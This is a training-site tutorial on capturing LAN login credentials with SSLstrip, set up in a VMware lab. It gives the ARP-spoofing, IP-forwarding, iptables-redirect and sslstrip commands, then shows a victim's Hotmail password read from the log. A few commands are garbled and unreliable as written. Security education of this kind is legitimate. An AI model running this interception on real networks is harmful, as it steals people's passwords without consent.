January 21, 2020

Tutorial: Using SSLSTRIP in a "Man in the Middle" Attack

fr4nc1stein
Share
Tutorial: Using SSLSTRIP in a "Man in the Middle" Attack - Cybrary

SSLSTRIP in a Man in the Middle Attack

Hello guys,In this tutorial, I'm going to teach you how to use a SSLSTRIP via the Kali OS.We'll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we'll try to use VMWARE and download the Kali Operating System. I'm using BT5 (Backtrack) in my presentation.

Requirements:

1. Kali OS  - Click here

2. Syntax Code from the Author of the SSLSTRIP

3. Common sense We're assuming SSLSTRIP is already installed in Kali Operating system:

Step 1: Open Terminal

Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here's the code:route -nornetstat -nr

Step 3: Port forward for accept packets and forward as vise versadisabled = 0enabled = 1Code: echo "1" > /proc/sys/net/ipv4/ip_forwardSee image below:

image 1

Step 4: In a real attack, we'd be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is 192.168.109.2. To use ARSPOOF, follow this code.Code: arpspoof -i eth0 -t victimip routeripSee images below:

image 2
three 3

Note: The $routerip was already modified in advanced tutorial. Don't follow the image - you can use this example:Code: arpspoof -t eth0 -t  192.168.109.18 192.168.109.2192.168.109.18 = victim ip192.168.109.2 =router ip or gateway

Step 5: Modify the IP table. Let's understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).Code: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000See image below:

imahe 4

Step 6: Voila, peak time. We're going to open our SSLSTRIP.In Kali:Application -> kali linux -> information gathering ->sslstrip analysis - >sslstripIn BT:Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltripSee the image below:

image 5

Run the following to start the SSLSTRIP, which we set at port 1000.In Kali:Code: sslstrip -l 1000In BT:Code: python sslstrip.pl –l 1000 Step 7: An example of Victim login at hotmail.com.See image below:

image 6

Step 8: Open the sslstrip.logSee image below:

image 7

The username and password is in cleartext - the blur portion in picture.

Thank you!

Regards from Philippine Security Researcher/fr4nc1stein/skyle17

Start learning with Cybrary

Create a free account

Related Posts

All Blogs
Building a Security Team
June 27, 2023

Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It

A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.

Read More
Building a Security Team
June 28, 2023

How to Build a Red Team

An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.

Read More
Tools & Applications
June 7, 2023

How to Make the Most of Blending Learning with Cybrary Live

Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.

Read More
News & Events
June 7, 2023

Introducing the New Cybrary Learner Experience

Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.

Read More